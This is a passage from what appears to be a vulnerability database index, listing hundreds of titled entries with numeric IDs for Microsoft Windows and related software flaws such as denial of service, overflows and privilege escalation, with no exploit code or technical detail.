Live Messenger (WLM) msnmsgr.exe Malformed Content-Type Header Remote DoS [55644] Microsoft Windows Live Messenger Client MSN Protocol over NAT Multiple Header Field Internal IP Disclosure [55332] Microsoft Windows PPTP Server (Raspptpe.sys) Malformed Control Packet Remote DoS [55309] Microsoft Windows ICMP Type 9 Packet Remote DoS [55227] CA ARCserve Backup for Windows Message Engine 0x3B Message Invalid Stub Data RPC Marshalling Error Remote DoS [55050] Microsoft Windows win32k.sys Thread Handling Local Race Condition DoS [54961] Microsoft Office PowerPoint Freelance Windows Translator (FL21WIN.DLL) Layout Parsing Overflow [54943] Microsoft Windows Kernel Desktop Parameter Manipulation Local Privilege Escalation [54942] Microsoft Windows Kernel Driver Class Registration Local Privilege Escalation [54941] Microsoft Windows Kernel User Mode Pointer Passing Local Privilege Escalation [54940] Microsoft Windows Kernel Desktop Object Manipulation Local Privilege Escalation [54939] Microsoft Office Works for Windows File Converter .wps Handling Overflow [54938] Microsoft Windows Active Directory Crafted LDAP(S) Request Handling Remote DoS [54937] Microsoft Windows Active Directory Crafted LDAP(S) Request Hexdecimal DN AttributeValue Handling Arbitrary Code Execution [54935] Microsoft Windows MSHTML Search Preview Display Information Disclosure [54933] Microsoft Windows Print Spooler Crafted Separator Page Arbitrary Local File Disclosure [54932] Microsoft Windows Print Spooler win32spl.dll EnumeratePrintShares Function Remote Overflow [54931] Microsoft Windows SystemParametersInfo() Function SPI_*DESKWALLPAPER Call Local DoS [54191] Microsoft Windows GDI+ PNG File Handling Infinite Loop DoS [53804] Microsoft Windows Media Player MID File Handling Overflow DoS [53668] Microsoft Windows ThreadPool ACL Enforcement Weakness Local Privilege Escalation [53666] Microsoft Windows Management Instrumentation (WMI) Service Isolation Local Privilege Escalation [53623] Microsoft Windows SearchPath File Open / Locating Unspecified Arbitrary Code Execution [53621] Microsoft Windows HTTP Services Digital Certificate Distinguished Name Mismatch Weakness [53620] Microsoft Windows HTTP Services Web Server Response Unspecified Integer Underflow [53619] Microsoft Windows HTTP Services NTLM Credential Replay Privileged Code Execution [53533] Microsoft Windows Task Manager (taskmgr.exe) I/O Activity Local Information Disclosure [53309] Microsoft Windows WINS 1Ch Registration Domain Controller Manipulation [53248] Microsoft Windows DNS Server Crafted Packets Remote Memory Consumption DoS [52892] Microsoft IE on Windows Link Click Unspecified Arbitrary Code Execution (PWN2OWN) [52694] Microsoft Windows Media Player Malformed GET Request DoS [52693] Microsoft Windows Mobile Bluetooth Stack OBEX FTP Service Traversal Arbitrary File Manipulation [52685] Microsoft Windows FTP Client Multiple Command Overflows [52683] Microsoft Windows explorer.exe Malformed PNG Handling DoS [52682] Microsoft Windows Explorer ZIP Handler DoS [52681] Microsoft Windows Firewall sessmgr.exe Port Restriction Local Bypass [52524] Microsoft Windows Invalid Pointer Local Privilege Escalation [52523] Microsoft Windows Handle Validation Local Privilege Escalation [52522] Microsoft Windows GDI Kernel Component Unspecified Remote Code Execution [52521] Microsoft Windows SChannel Certificate Based Authentication Spoofing Bypass [52520] Microsoft Windows WPAD WINS Server Registration Web Proxy MiTM Weakness [52519] Microsoft Windows DNS Server WPAD Registration Dynamic Update MiTM Weakness [52518] Microsoft Windows DNS Server Response Response Validation Transaction ID Prediction Weakness [52517] Microsoft Windows DNS Server Query Validation Spoofing [51433] Microsoft Windows Crafted CHM File Handling Overflow [51133] Microsoft Windows Media Player Multiple File Handling Remote Overflow [50567] Microsoft Windows WordPad Text Converter Unspecified Memory Corruption [50566] Microsoft Windows Explorer search-ms Protocol Handler Arbitrary Code Execution [50565] Microsoft Windows Explorer Saved Search File Handling Arbitrary Code Execution [50562] Microsoft Windows GDI WMF Image Size Parameter Parsing Overflow [50561] Microsoft Windows GDI WMF Image Parsing Integer Math Overflow [50559] Microsoft Windows Media Component Crafted ISATAP Address NTLM Credential Disclosure [50558] Microsoft Windows Media Component Service Principal Name (SPN) Credential Reflection Arbitrary Code Execution [50533] Microsoft Windows Media Services nskey.dll ActiveX CallHTMLHelp Method Overflow [50287] Microsoft Windows Vista iphlpapi.dll CreateIpForwardEntry2() Function Memory Corruption [50280] Microsoft Windows UnhookWindowsHookEx Call Saturation Race Condition Local DoS [50252] Microsoft Windows Media Player Crafted DAT File MThd Header Handling DoS [50251] Microsoft Windows Media Player Crafted MIDI File MThd Header Handling DoS [50000] Microsoft Windows Active Directory LDAP Server Bind Request User Account Enumeration [49897] Microsoft Windows Explorer Crafted ZIP File Handling DoS [49895] Microsoft Windows GDI+ gdiplus.dll Crafted ICO File Handling DoS [49736] Microsoft Windows SMB NTLM Authentication Credential Replay Remote Code Execution [49364] Cisco PIX / ASA Microsoft Windows NT VPN Domain Authentication Bypass [49068] Microsoft Host Integration Server (HIS) SNA RPC Request Remote Overflow [49061] Microsoft Windows Ancillary Function Driver (afd.sys) Local Privilege Escalation [49058] Microsoft Windows Active Directory LDAP(S) Request Handling Remote Overflow [49057] Microsoft Windows SMB File Name Handling Remote Underflow [49056] Microsoft Windows Kernel Memory Corruption Local Privilege Escalation [49055] Microsoft Windows Kernel New Window Creation Process Arbitrary Code Execution [49054] Microsoft Windows Kernel Double-free Unspecified Local Privilege Escalation [49053] Microsoft Windows Virtual Address Descriptors (VAD) Local Privilege Escalation [48837] Microsoft Windows Vista Page Fault Handling DoS [48789] Microsoft Windows Mobile Bluetooth Device Name Overflow DoS [48359] Microsoft Windows Vista ASLR / DEP Memory Protection Bypass [48302] Microsoft Windows nslookup.exe DNS Zone Transfer Request Unspecified Arbitrary Code Execution [48153] Microsoft Windows srv.sys WRITE_ANDX SMB Packet Handling Remote DoS [48037] Microsoft Windows Image Acquisition Logger ActiveX Open Method Arbitrary File Download [48009] Microsoft Windows Kernel IopfCompleteRequest API Overflow [47963] Microsoft Windows Media Player Audio File Sampling Rate Remote Code Execution [47962] Microsoft Windows Media Encoder wmex.dll ActiveX Overflow [47412] Microsoft Windows Event System Crafted Request Array Index Handling Remote Privilege Escalation [47411] Microsoft Windows Event System Per-user Subscription Crafted Request Remote Privilege Escalation [47403] Microsoft Windows Messenger ActiveX (Messenger.UIAutomation.1) Remote Privileged Operations [47396] Microsoft Windows IPsec Policy Import Failure Cleartext Remote Information Disclosure [47395] Microsoft Windows Image Color Management System (MSCMS) mscms.dll InternalOpenColorProfile Function ICM Image File Handling Overflow [46990] Microsoft Windows Explorer (explorer.exe) Unspecified WMF Handling DoS [46801] Microsoft Windows Calendar Malformed ICS File Handling DoS [46778] Microsoft Windows DNS Query ID Field Prediction Cache Poisoning [46777] Microsoft Windows DNS Socket Entropy Weakness Cache Poisoning [46774] Microsoft Windows Explorer Saved Search File Handling DoS [46210] Microsoft Windows Installer msiexec.exe /uninstall Option GUID Value Overflow [46068] Microsoft Windows Pragmatic General Multicast (PGM) Fragment Handling Remote DoS [46067] Microsoft Windows Pragmatic General Multicast (PGM) Packet Handling Remote DoS [46066] Microsoft Windows Active Directory LDAP Request Processing Remote DoS [46063] Microsoft Windows Internet Name Service (WINS) Packet Handling Local Privilege Escalation [46062] Microsoft Windows Speech Components (sapi.dll) Speech Recognition Code Execution [46061] Microsoft Windows Bluetooth SDP Packet Processing Remote Code Execution [45809] Microsoft Windows Vista Kernel Unspecified Remote Issue [45523] Microsoft Windows Live Messenger GDI Engine Malformed File Handling Overflow [45521] Microsoft Windows Explorer (explorer.exe) Malformed PNG Handling Remote DoS [45280] Microsoft Windows Media Player (WMP) mplay32.exe MP3 Filename Handling Local Overflow [45048] Microsoft Windows XP I2O Utility Filter Driver (i2omgmt.sys) Local Privilege Escalation [44975] Microsoft Windows CE GIF Imaging Component Unspecified Arbitrary Code Execution [44974] Microsoft Windows CE JPEG (GDI+) Handling Unspecified Arbitrary Code Execution [44880] Microsoft Windows msjet40.dll MDB File Handling Overflow [44580] Microsoft Windows Microsoft Distributed Transaction Coordinator (MSDTC) SeImpersonatePrivilege User Right Local Privilege Escalation [44318] Trend Micro ServerProtect for Windows (SpntSvc.exe) StRpcSrv.dll Arbitrary Remote Code Execution [44215] Microsoft Windows GDI EMF Filename Parameter Handling Overflow [44214] Microsoft Windows GDI WMF Handling CreateDIBPatternBrushPt Function Overflow [44213] Microsoft Windows GDI (gdi32.dll) EMF File Handling Multiple Overflows [44206] Microsoft Windows Kernel Unspecified Privilege Escalation [44200] Microsoft Windows Random Number Generator (RNG) CryptGenRandom Function Prediction Weakness [44172] Microsoft Windows DNS Client Predictable Transaction ID Spoofing [44171] Microsoft Windows HxTocCtrl ActiveX (hxvz.dll) Memory Corruption [44018] Microsoft Windows Vista SP1 Page Protection Unspecified Bypass [43773] Microsoft Windows Explorer (explorer.exe) GIF File Handling Remote DoS [43715] Microsoft Windows Media Player (WMP) AIFF File Handling DoS [43603] Microsoft Windows DNS Server Dynamic Update Mechanism Client Authentication Bypass [43434] Microsoft Windows Vista NoDriveTypeAutoRun Auto-Play Bypass [43307] Microsoft Windows Explorer (explorer.exe) AVI Handling Right-Click Action DoS [42579] 3ivx MPEG-4 on Microsoft Windows Media Player (WMP) mplayer2.exe MP4 File Handling Overflow [41628] IBM Informix Storage Manager (ISM) Windows RPC Components XDR Library Multiple Unspecified Remote Overflows [41553] Microsoft Windows Explorer BMP Width Dimension Handling Overflow [41491] Microsoft Windows Vista Crafted DHCP Response DoS [41463] Microsoft Windows OLE Automation Unspecified Memory Corruption Remote Code Execution [41156] Microsoft Windows x64 Kernel PatchGuard Bypass [41155] Microsoft Windows Hardware-enforced DEP Bypass [41154] Microsoft Windows XP EFS Cleartext Password Storage [41097] Microsoft Windows Task Scheduler (at.exe) Local Privilege Escalation [41093] Microsoft Windows Media Player (WMP) MSIE Static Invocation HTML Rendering Weakness [41092] Microsoft Windows DNS Service Predictable Transaction ID Weakness [41090] Microsoft Windows w/ IE7 Shell32.dll Crafted URL Third-party Application Arbitrary Command Execution [41065] Microsoft Windows kernel32.dll Multiple Function DoS [41064] Microsoft Windows ntdll.dll Multiple Function DoS [41059] Microsoft Windows ARP Saturation Remote DoS [40071] Microsoft Windows LSASS Crafted LPC Request Local Privilege Escalation [40070] Microsoft Windows TCP/IP IGMPv3 / MLDv2 Packet Handling Remote Code Execution [40069] Microsoft Windows TCP/IP ICMP RDP Packet Handling Remote DoS [39751] Trend Micro ServerProtect for Windows (SpntSvc.exe) StRpcSrv.dll Multiple Function Remote Overflow [39750] Trend Micro ServerProtect for Windows Agent Service RPCFN_CopyAUSrc Function Remote Overflow [39521] Cisco Security Agent for Microsoft Windows Crafted SMB Packet Remote Overflow [39131] Microsoft Windows Media Player Crafted AU File Application Crash Remote DoS [39127] Microsoft Windows DirectX WAV / AVI File Parsing Arbitrary Code Execution [39126] Microsoft Windows DirectX SAMI File Parsing Arbitrary Code Execution [39125] Microsoft Windows Vista SMBv2 Signing Unspecified Remote Code Execution [39124] Microsoft Windows Vista Kernel Legacy Reply Path Validation Local Privilege Escalation [39123] Microsoft Windows Message Queuing MSMQ Message Handling Arbitrary Code Execution [39122] Microsoft Windows Media Format Runtime ASF Parsing Arbitrary Code Execution [39014] Microsoft Windows RunAs Command Local Arbitrary Process DoS [38991] Microsoft Windows PNG Image IHDR block Multiple Crafted Value Remote DoS [38499] Microsoft Windows Mobile ActiveSync USB Weak PIN/Password Encryption [38494] Microsoft Windows Graphics Device Interface (GDI+, GdiPlus.dll) ICO Handling DoS [37637] Microsoft Windows Crafted HLP File Overflow [37635] Microsoft Windows Virtual DOS Machine (VDM) PhysicalMemory Race Condition Local Privilege Escalation [37631] Microsoft Windows Malformed NNTP Response Remote Memory Corruption [37627] Microsoft Windows Kodak Image Viewer Image File Handling Arbitrary Code Execution [37105] Microsoft Windows mfc42.dll / mfc42u.dll CFileFind Class FindFile() Function Overflow [36938] Microsoft Windows XP Kernel Process Scheduler Local DoS [36937] Microsoft Windows / IE ActiveX (triedit.dll) Multiple Property NULL Pointer DoS [36935] Microsoft Windows Services for UNIX Local Privilege Escalation [36393] Microsoft Windows Vista Weather Gadgets Crafted HTML Attribute Unspecified Issue [36392] Microsoft Windows Vista Contacts Gadget Crafted Contact Information Arbitrary Code Execution [36391] Microsoft Windows Vista Feed Headlines Gadgets RSS Feed XSS [36390] Microsoft Windows Vector Markup Language (VML) VGX.DLL CDownloadSink Class Overflow [36388] Microsoft Windows Graphics Rendering Engine (GDI) Metafile Image Handling Overflow [36387] Microsoft Windows OLE Automation TextNode Object substringData Method Overflow [36386] Microsoft Windows Media Player Skin File Handling Crafted Header Arbitrary Code Execution [36385] Microsoft Windows Media Player Skin File Handling Overflow [36149] Microsoft IE on Windows Mobile Unspecified Overflow DoS [36148] Microsoft Windows Mobile Pictures and Videos Malformed JPEG DoS [36146] Microsoft Windows Terminal Services TLS Downgrade Weakness [36145] Microsoft Windows Event Viewer (eventvwr.exe) Log Data Exclusion [36144] Microsoft Windows Bluetooth Unspecified Remote Privilege Escalation [36143] Microsoft Windows Mobile Pocket PC Edition Unspecified Remote Privilege Escalation [36141] Microsoft Windows Explorer Ole32.dll Crafted Document Summary Information DoS [36138] Microsoft Windows Active Directory Time Restriction User Enumeration [36111] Symantec Backup Exec for Windows RPC Crafted ncacn_ip_tcp Request Remote Overflow [35962] Microsoft Windows XP Registry QHEADLES Permission Weakness [35961] Microsoft Windows Active Directory LDAP Service Crafted Request Remote DoS [35960] Microsoft Windows Active Directory LDAP Service Convertible Attribute Remote Code Execution [35952] Microsoft Windows Vista Teredo Crafted IPv6 Traffic Blocking Rule Bypass [35637] Microsoft Windows Unspecified Remote Code Execution [35347] Microsoft Windows Schannel Security Package Crafted Digital Signature Arbitrary Code Execution [35346] Microsoft Outlook Express / Windows Mail MHTML Content Disposition Parsing Cross Domain Information Disclosure [35345] Microsoft Outlook Express / Windows Mail URL Parsing Cross Domain Information Disclosure [35344] Microsoft Windows Vista Local User Information Data Stores Information Disclosure [35341] Microsoft Windows Win32 API Unspecified Remote Code Execution [34490] Microsoft Windows Explorer Folder Browsing WMV Handling DoS [34103] Microsoft Windows Web Proxy Autodiscovery Protocol (WPAD) DNS Subversion [34102] Microsoft Windows Vista Mail Client Crafted Link Arbitrary Program Execution [34101] Microsoft Windows XP winmm.dll mmioRead Function DoS [34099] Microsoft Windows TrueType Fonts Rasterizer Local Privilege Escalation [34098] Microsoft Windows GDI Functions Windows Metafile (WMF) Handling DoS [34097] Microsoft Windows GDI Enhanced Metafile (EMF) Handling Local Privilege Escalation [34096] Microsoft Windows GDI Invalid Window Size Local Privilege Escalation [34095] Microsoft Windows GDI Crafted Image Local Privilege Escalation [34011] Microsoft Windows Kernel Mapped Memory Local Privilege Escalation [34010] Microsoft Windows XP UPnP Remote Memory Corruption [34009] Microsoft Windows Agent URL Parsing Memory Corruption [34008] Microsoft Windows Vista CSRSS Local Privilege Escalation [33668] Microsoft Windows Vista Meeting Space DFSR.exe TCP Connection Persistence [33667] Microsoft Windows Vista Persistent Established Teredo Address [33666] Microsoft Windows Vista Teredo nonce Spoofing [33665] Microsoft Windows Vista Neighbor Discovery Crafted Neighbor Advertisement Redirect [33664] Microsoft Windows Vista Crafted Gratuitous ARP Overwrite DoS [33663] Microsoft Windows Vista LLTD Mapper HELLO Packet Spoofing [33662] Microsoft Windows Vista LLTD Mapper Real Source Field Host Spoofing [33661] Microsoft Windows Vista LLTD Responder Race Condition Host Spoofing [33660] Microsoft Windows Vista LLTD Mapper EMIT Packet Gathering Remote DoS [33635] AMD ATI Radeon for Microsoft Windows Vista atikmdag.sys Kernel Mode Driver DoS [33628] Microsoft Windows NDISTAPI.sys Permission Weakness Local DoS [33474] Microsoft Windows ReadDirectoryChangesW API Function File System Information Disclosure [33307] Microsoft Windows Media MID Malformed Header Chunk DoS [33306] Microsoft Windows Explorer explorer.exe WMV File Handling DoS [33219] Microsoft Windows Live Messenger Gestual Emoticon Saturation CPU Consumption DoS [32629] Microsoft IE on Windows Mobile Malformed WML Page Unspecified DoS [32628] Microsoft Windows / IE ActiveX (mshtml.dll) Multiple Property NULL Pointer DoS [31897] Microsoft Windows CSRSS NtRaiseHardError Function Arbitrary Memory Disclosure [31890] Microsoft Windows Shell New Hardware Local Privilege Escalation [31889] Microsoft Windows XP SP2 Image Aquisition Service Local Privilege Escalation [31885] Microsoft Windows OLE Dialog Memory Corruption Remote Code Execution [31884] Microsoft Windows HTML Help ActiveX Control Arbitrary Code Execution [31659] Microsoft Windows CSRSS MessageBox Function Privilege Escalation [31645] Microsoft Windows DNS Recursive Query DoS [30997] Microsoft Windows .manifest File Handling Local DoS [30871] Microsoft Windows DRM drmstor.dll ActiveX Object StoreLicense Function Memory Corruption [30821] Microsoft Outlook Express Windows Address Book Contact Record Code Execution [30819] Microsoft Windows Media Player ASX Playlist Handling Overflow [30818] Microsoft Windows Media Player ASF Parsing Overflow [30817] Microsoft Windows Remote Installation Service TFTP Arbitrary File Overwrite [30811] Microsoft Windows SNMP Service Remote Overflow [30405] Microsoft Windows Active Directory Unspecified DoS [30263] Microsoft Windows Workstation Service Crafted Message Remote Overflow [30262] Microsoft Windows Agent ACF File Handling Memory Corruption [30261] Microsoft Windows Client Service for NetWare (CSNW) Crafted Message Remote DoS [30260] Microsoft Windows Client Service for NetWare (CSNW) Crafted Message Remote Code Execution [30214] Microsoft Windows GDI Kernel Structure Modification Code Execution [30096] Microsoft Windows NAT Helper Components ipnathlp.dll with ICS Malformed DNS Query DoS [29529] Microsoft Windows 2000 creator.dll ActiveX COM Object Memory Corruption [29528] Microsoft Windows 2000 msdxm.ocx ActiveX COM Object Memory Corruption [29527] Microsoft Windows 2000 myinfo.dll ActiveX COM Object Memory Corruption [29526] Microsoft Windows 2000 ciodm.dll ActiveX COM Object Memory Corruption [29439] Microsoft Windows Server Service Crafted SMB Packet Unspecified Issue [29424] Microsoft Windows Object Packager File Extension Dialog Spoofing [29409] Microsoft Windows TCP 135 Crafted Packet Saturation DoS [29351] Microsoft Windows Terminal Services tsuserex.dll COM Object Instantiation [29231] Microsoft Windows Help File Viewer (winhlp32.exe) HLP File Arbitrary Code Execution [29128] Microsoft Windows gdiplus.dll Divide-by-zero DoS [28731] Microsoft Windows Pragmatic General Multicast (PGM) Multicast Message Arbitrary Code Execution [28729] Microsoft Windows Indexing Service Unspecified XSS [28372] Microsoft Windows Explorer URL Passing Recursive file Tag Local DoS [28208] Microsoft Windows Live Messenger Contact List .ctt File Heap Overflow [27848] Microsoft Windows Kernel Unspecified Local Privilege Escalation [27847] Microsoft Windows Unhandled Exception Unspecified Remote Code Execution [27846] Microsoft Windows Winlogon Search Path Subversion Local Privilege Escalation [27844] Microsoft Windows DNS Client Service Record Response Overflow [27843] Microsoft Windows Winsock API Hostname Remote Code Execution [27797] Microsoft Windows GDI library (gdi32.dll) createBrushIndirect Function WMF Parsing DoS [27644] Microsoft Windows Server Driver (srv.sys) Crafted SMB Packet NULL Dereference DoS [27155] Microsoft Windows Server Service SRV.SYS Crafted Request SMB Information Disclosure [27154] Microsoft Windows Server Service SRV.SYS First-class Mailslot Message Remote Overflow [27152] Microsoft Windows IIS ASP Page Processing Overflow [27151] Microsoft Windows DHCP Client Service Crafted Response Overflow [26440] Microsoft Windows SMB MrxSmbCscIoctlOpenForCopyChunk Function Overflow [26439] Microsoft Windows SMB MRXSMB.SYS MrxSmbCscIoctlCloseForCopyChunk Remote DoS [26437] Microsoft Windows RRAS RASMAN Remote Overflow [26433] Microsoft Windows TCP/IP Protocol Driver Source Routing Overflow [26432] Microsoft Windows jgdw400.dll ART Image Rendering Overflow [26431] Microsoft Windows Graphics Rendering Engine PolyPolygon Function Overflow [26430] Microsoft Windows Media Player PNG Processing Overflow [25949] Microsoft Windows INETCOMM.DLL mhtml: URI Overflow [25761] Microsoft Windows NTDLL.DLL RtlDosPathNameToNtPathName_U API Path Conversion Weakness [25501] Microsoft Windows itss.dll CHM Processing Overflow [25429] Novell Client for Windows DPRPC library (DPRPCW32.DLL) ndps_xdr_array Function Remote Overflow [25336] Microsoft Windows Distributed Transaction Coordinator (DTC) BuildContextW Request DoS [24802] Microsoft Windows Help winhlp32.exe Embedded Image Processing Overflow [24519] Microsoft Outlook Express Windows Address Book (.wab) Processing Overflow [24516] Microsoft Windows Explorer COM Object Handling Remote Code Execution [23136] Microsoft Windows/Office Korean Input Method Editor (IME) ShellAbout() Privilege Escalation [23134] Microsoft Windows Web Client Service Crafted WebDAV Request Overflow [23133] Microsoft Windows IGMPv3 Crafted Packet Remote DoS [23132] Microsoft Windows Media Player Plug-in Malformed EMBED Element Arbitrary Code Execution [23131] Microsoft Windows Media Player Bitmap File Processing Overflow [23047] Microsoft Windows SSDP SERVICE_CHANGE_CONFIG Permission Weakness Privilege Escalation [23046] Microsoft Windows SCardSvr SERVICE_CHANGE_CONFIG Permission Weakness Privilege Escalation [23045] Microsoft Windows NetBT SERVICE_CHANGE_CONFIG Permission Weakness Privilege Escalation [23044] Microsoft Windows UPnP SERVICE_CHANGE_CONFIG Permission Weakness Privilege Escalation [22710] Microsoft Windows Ad-hoc Network Advertisement Weakness [22697] Microsoft Windows Unspecified Display Driver Large Image Processing DoS [22396] Microsoft Windows WMF Processing ExtEscape POSTSCRIPT_INJECTION Function Overflow DoS [22371] Microsoft Windows WMF Processing ExtCreateRegion Function Overflow DoS [21987] Microsoft Windows Shimgvw.dll SETABORTPROC Function Crafted WMF Arbitrary Code Execution [21598] Microsoft Windows 2000 NetBIOS Port Malformed TCP Packet Parsing Remote DoS [21536] Microsoft Windows backup File Name Extension Overflow [21510] Microsoft Windows SynAttackProtect Bypass [20916] Microsoft Windows UPnP GetDeviceList Remote DoS [20875] Microsoft Windows XP Professional Upgrade MSIE Rollback [20580] Microsoft Windows GetEnhMetaFilePaletteEntries() EMF File Rendering DoS [20579] Microsoft Windows GDI Metafile SetPalette Entries Overflow [20497] Microsoft Windows 98SE User32.dll Icon DoS [20367] Microsoft Windows XP Fast User Switching Arbitrary Account Lockout [20366] Microsoft Windows XP Remote Desktop Client Cleartext Account Name Transmission [20364] Microsoft Windows keybd_event Validation Privilege Escalation [20356] Microsoft Windows Win32k.sys ShowWindow Function Local DoS [20279] Microsoft Windows ME ssdpsrv.exe Crafted SSDP Message DoS [20256] Microsoft Windows 2000 NTFS Volume Macintosh Client Directory Permission Modification [20222] Microsoft Windows 2000 runas.exe Named Pipe Spoofing Information Disclosure [20221] Microsoft Windows 2000 runas.exe Named Pipe Single Thread DoS [20220] Microsoft Windows 2000 runas.exe Cleartext Authentication Information Disclosure [20188] Microsoft Windows Crafted SMB SMBnegprots Request DOS [20148] Microsoft Windows smbmount Directory Manipulation Saturation DoS [20028] Microsoft Windows XP SP2 TFTP Local Overflow [20002] Microsoft Windows 2000 CHKDSK Fix Mode File ACL Failure [20001] Microsoft Windows 2000 Terminal Service Client Connection IP Logging Failure [20000] Microsoft Windows 2000 Domain Administrator Computer Lock Bypass [19999] Microsoft Windows 2000 FQDN Domain Login Password Expiry Bypass [19998] Microsoft Windows 2000 UPN Credentialed Login Group Policy Failure [19997] Microsoft Windows 2000 WideCharToMultiByte Function String Termination Issue [19996] Microsoft Windows 2000 Event ID 1704 Group Policy Failure [19995] Microsoft Windows 2000 SECEDIT Long Folder ACL Set Issue [19994] Microsoft Windows 2000 audit directory service access 565 Event Logging Failure [19993] Microsoft Windows 2000 LDAPS CA Trust Issue [19922] Microsoft Windows Client Service for NetWare (CSNW) Remote Overflow [19904] Microsoft Windows DTC Packet Relay DoS [19903] Microsoft Windows DTC Transaction Internet Protocol (TIP) DoS [19902] Microsoft Windows COM+ Remote Code Execution [19901] Microsoft Windows FTP Client Arbitrary File Write [19900] Microsoft Windows Shell Crafted .lnk File Arbitrary Code Execution (2005-2122) [19899] Microsoft Windows Shell Crafted .lnk File Arbitrary Code Execution (2005-2118) [19898] Microsoft Windows Web View Arbitrary Script Injection [19873] Microsoft Windows XP Wireless Zero Configuration Credential/Key Disclosure [19857] Microsoft Windows SeDebugPrivilege NtSystemDebugControl Function Privilege Escalation [19775] Microsoft Windows XP ISAKMP UDP Saturation DoS [19764] Microsoft Windows XP Malformed explorer.exe.manifest Local DoS [19287] Microsoft Windows Firewall Malformed Registry Entry Ruleset Exception Weakness [19187] Microsoft Windows NT/2000 DNS Server Non-delegated NS Glue Record Cache Poisoning [19185] Microsoft Windows XP Internet Connection Firewall sessmgr.exe Accss Control Bypass [19007] Microsoft Windows 95 smbclient Triple Dot Traversal Arbitrary Command Execution [19006] Microsoft Windows NT snmp.exe Malformed OID Packet Saturation DoS [18956] Microsoft Windows Registry Editor (Regedt32.exe) Long String Obfuscation [18830] Microsoft Windows UMPNPMGR wsprintfW Remote Overflow [18829] Microsoft Windows Open Type (EOT) Font Handling Remote Overflow [18828] Microsoft Windows Distributed Transaction Coordinator (DTC) Memory Modification Remote Code Execution [18824] Microsoft Windows Unspecified Remote Code Execution (EEYEB-20050627) [18823] Microsoft Windows Kernel APC Queue Manipulation Local Privilege Escalation [18821] Microsoft Windows Unspecified Remote Code Execution (EEYEB-20050505) [18820] Microsoft Windows GDI EMF/WMF Metafile Processing Multiple Overflows [18730] Microsoft Windows XP SP1 Raw IP Empty Datagram DoS [18729] Microsoft Windows SNMP LAN Manager (LANMAN) MIB Extension GET/NEXT Request DoS [18728] Microsoft Windows QueryIpMatching Weakness DNS Cache Poisoning [18681] Microsoft Windows XP User Account Manager Hidden User [18624] Microsoft Windows Remote Desktop Protocol (RDP) Crafted Packet Remote DoS [18609] Microsoft Windows Kerberos PKINIT Domain Controller Spoofing [18608] Microsoft Windows Kerberos Crafted Packet Remote DoS [18607] Microsoft Windows Print Spooler Service Remote Overflow [18606] Microsoft Windows Telephony Application Programming Interface (TAPI) Overflow [18605] Microsoft Windows Plug-and-Play Service Remote Overflow [18545] Microsoft Windows NT Cenroll ActiveX (xenroll.dll) File Creation Saturation DoS [18493] Microsoft Windows USB Device Driver Overflow [17893] Microsoft ASP.NET RPC/encoded Mode Malformed SOAP Message DoS [17885] Microsoft Windows Network Connections Service netman.dll Remote DoS [17830] Microsoft Windows Color Management Module ICC Profile Format Tag Remote Overflow [17434] Microsoft Windows ASN.1 BERDecBitString Function Overflow [17309] Microsoft Windows Web Client Request Processing Remote Code Execution [17308] Microsoft Windows Server Message Block (SMB) Remote Code Execution [17305] Microsoft Windows HTML Help (CHM) File Overflow [17304] Microsoft Windows Interactive Training .cbo File User Field Overflow [17131] Microsoft Windows Remote Desktop Protocol (RDP) Private Key Disclosure [16494] Microsoft Windows Media Player WMDRM License Acquisition Page Redirection [16430] Microsoft Windows Animated Cursor (ANI) Capability AnimationHeaderBlock Length Field Overflow [15981] Microsoft Windows XP helpctr.exe Crafted URL Command Execution [15739] Microsoft Windows Malformed Image Rendering DoS [15707] Microsoft Windows Explorer Web View Arbitrary Script Insertion [15469] Microsoft Windows MSHTA Shell Application Association Arbitrary Remote Script Execution [15463] Microsoft Windows IP Validation Failure Remote Code Execution [15462] Microsoft Windows CSRSS Local Overflow [15461] Microsoft Windows Object Management Malformed Request DoS [15460] Microsoft Windows Kernel Access Request Local Privilege Escalation [15459] Microsoft Windows Font Processing Local Privilege Escalation [15458] Microsoft Windows Message Queuing Remote Overflow [15379] Microsoft Windows ActiveDirectory LDAP Authentication Bypass [15363] Microsoft Windows Explorer.exe Malformed .wmf Processing DoS [15343] Microsoft Windows Server 2003 Malformed HTTP Cookie Header CGI DoS [15341] Microsoft Windows Server 2003 SMB Redirector Processing DoS [15340] Microsoft Windows Server 2003 Terminal Service Client Print DoS [15339] Microsoft Windows Server Atmf.dll Adobe Font Unloading DoS [15338] Microsoft Windows Server 2003 Terminal Session Close DoS [15337] Microsoft Windows Server 2003 CreateProcessWithLogonW() Function Process Disclosure [15336] Microsoft Windows Server 2003 Shutdown.exe Shut Down Failure [15335] Microsoft Windows Server 2003 MIT Kerberos Realm Authentication Group Policy Failure [15334] Microsoft Windows Server 2003 Shared Folder Permission Weakness [15333] Microsoft Windows Server 2003 EFS File Copy LDAP Connection DoS [15332] Microsoft Windows Server 2003 Citrix Metaframe Encryption Policy Failure [15331] Microsoft Windows Server 2003 Home Folder Path Permission Inheritance Failure [15215] Microsoft Windows SMTP E-mail Malformed Time Stamp DoS [15171] Microsoft Windows XP Search Function Arbitrary XML Injection [15075] Microsoft Windows wab32.dll Malformed .wab File DoS [15011] Microsoft Windows Remote Desktop TSShutdn.exe Unauthenticated Shutdown DoS [14862] Microsoft Windows GDI32.DLL GetEnhMetaFilePaletteEntries() API EMF File DoS [14741] Microsoft Windows XP CommCtl32.dll Shatter Code Execution [14578] Microsoft Windows Malformed TCP SYN Loopback Packet Remote DoS (land) [14509] Microsoft Services for Unix Malformed RPC Client Fragment Packet DoS [14497] Microsoft Services for Unix RPC Library Malformed Packet Fragment DoS [14475] Microsoft Windows Script Engine for Jscript JsArrayFunctionHeapSort Overflow [14399] Microsoft Windows Media Player .wmf Detection Auto-Run Weakness [14182] Microsoft Windows Drive Restriction Group Policy Bypass [14118] Microsoft Windows Malformed ARP Packet Saturation DoS [13996] Microsoft Windows 2000 IKE Malformed Packet Saturation Remote DoS [13987] Microsoft Windows XP Help Center helpctr.exe Long hcp: URL Overflow [13959] Microsoft Windows Universal Plug and Play (UPnP) Malformed Request DoS [13609] Microsoft Windows Hyperlink Object Library Overflow [13602] Microsoft Windows OLE Input Validation Overflow [13601] Microsoft Windows COM Structured Storage Privilege Escalation [13600] Microsoft Windows SMB Transaction Data Overflow [13599] Microsoft Windows License Logging Service Overflow [13597] Microsoft Windows Media Player PNG File Overflow [13596] Microsoft Windows XP Named Pipe Username Disclosure [13595] Microsoft Windows Sharepoint Services HTML Redirection XSS [13577] Microsoft Windows NetBIOS Remote Host Information Disclosure [13481] Microsoft Windows NT OffloadModExpo CryptographyOffload Registry Key Permission Weakness [13480] Microsoft Windows NT MTS Package 